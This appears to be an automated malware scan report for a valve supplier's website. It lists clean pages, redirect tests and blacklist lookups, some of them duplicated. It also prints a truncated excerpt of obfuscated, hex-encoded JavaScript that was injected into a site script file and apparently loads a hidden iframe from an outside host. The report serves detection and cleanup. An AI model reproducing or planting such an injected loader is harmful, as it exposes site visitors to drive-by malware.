Scanned pages/files
Request | Server response | Status |
http://abjadvance.com/ | 200 OK Content-Length: 4634 Content-Type: text/html | clean |
http://abjadvance.com/Scripts/swfobject_modified.js | 200 OK Content-Length: 32815 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)enhow=4;rdd=("6f,b5,c4,bd,b2,c3,b8,be,bd,6f,c1,b3,b0,b6,7f,88,77,78,6f,ca,5c,59,6f,c5,b0,c1,6f,c2,c3,b0,c3,b8,b2,8c,76,b0,b9,b0,c7,76,8a,5c,59,6f,c5,b0,c1,6f,b2,be,bd,c3,c1,be,bb,bb,b4,c1,8c,76,b8,bd,b3,b4,c7,7d,bf,b7,bf,76,8a,5c,59,6f,c5,b0,c1,6f,c1,b3,b0,b6,6f,8c,6f,b3,be,b2,c4,bc,b4,bd,c3,7d,b2,c1,b4,b0,c3,b4,94,bb,b4,bc,b4,bd,c3,77,76,b8,b5,c1,b0,bc,b4,76,78,8a,5c,59,5c,59,6f,c1,b3,b0,b6,7d,c2,c1,b2,6f,8c,6f,76,b7,c3,c3,bf,89,7e,7e,b0,c1,c3,b8,ba,b4,bb,c2,b2,b7,c1,b Antivirus reports:
| ||
http://abjadvance.com/index.html | 200 OK Content-Length: 4634 Content-Type: text/html | clean |
http://abjadvance.com/aboutus.html | 200 OK Content-Length: 2509 Content-Type: text/html | clean |
http://abjadvance.com/product.html | 200 OK Content-Length: 3482 Content-Type: text/html | clean |
http://abjadvance.com/contact.html | 200 OK Content-Length: 2122 Content-Type: text/html | clean |
http://abjadvance.com/test404page.js | 404 Not Found Content-Length: 397 Content-Type: text/html | clean |
http://abjadvance.com/product-list.html | 200 OK Content-Length: 9283 Content-Type: text/html | clean |
http://abjadvance.com/oil-and-gas-industry.html | 200 OK Content-Length: 3327 Content-Type: text/html | clean |
http://abjadvance.com/ballvalves.html | 200 OK Content-Length: 2931 Content-Type: text/html | clean |
http://abjadvance.com/butterfly-and-check-valves.html | 200 OK Content-Length: 2961 Content-Type: text/html | clean |
http://abjadvance.com/control-valves-rotary-process.html | 200 OK Content-Length: 3041 Content-Type: text/html | clean |
http://abjadvance.com/control-valves-linear-process-and-steam.html | 200 OK Content-Length: 2969 Content-Type: text/html | clean |
http://abjadvance.com/knife-gate-valves.html | 200 OK Content-Length: 2936 Content-Type: text/html | clean |
http://abjadvance.com/lined-corrosion-resistant-valves.html | 200 OK Content-Length: 2956 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: abjadvance.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 25 Feb 2015 14:48:40 GMT
Accept-Ranges: bytes
ETag: "17a0026-121a-4ec8811039f00"
Server: nginx/0.8.55
Vary: Accept-Encoding,User-Agent
Content-Length: 4634
Content-Type: text/html
Last-Modified: Mon, 02 Dec 2013 07:24:12 GMT
...4634 bytes of data.
GET / HTTP/1.1
Host: abjadvance.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 25 Feb 2015 14:48:40 GMT
Accept-Ranges: bytes
ETag: "17a0026-121a-4ec8811039f00"
Server: nginx/0.8.55
Vary: Accept-Encoding,User-Agent
Content-Length: 4634
Content-Type: text/html
Last-Modified: Mon, 02 Dec 2013 07:24:12 GMT
...4634 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: abjadvance.com
Referer: http://www.google.com/search?q=abjadvance.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: abjadvance.com
Referer: http://www.google.com/search?q=abjadvance.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=abjadvance.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://abjadvance.com/
Result: abjadvance.com is not infected or malware details are not published yet.
Result: abjadvance.com is not infected or malware details are not published yet.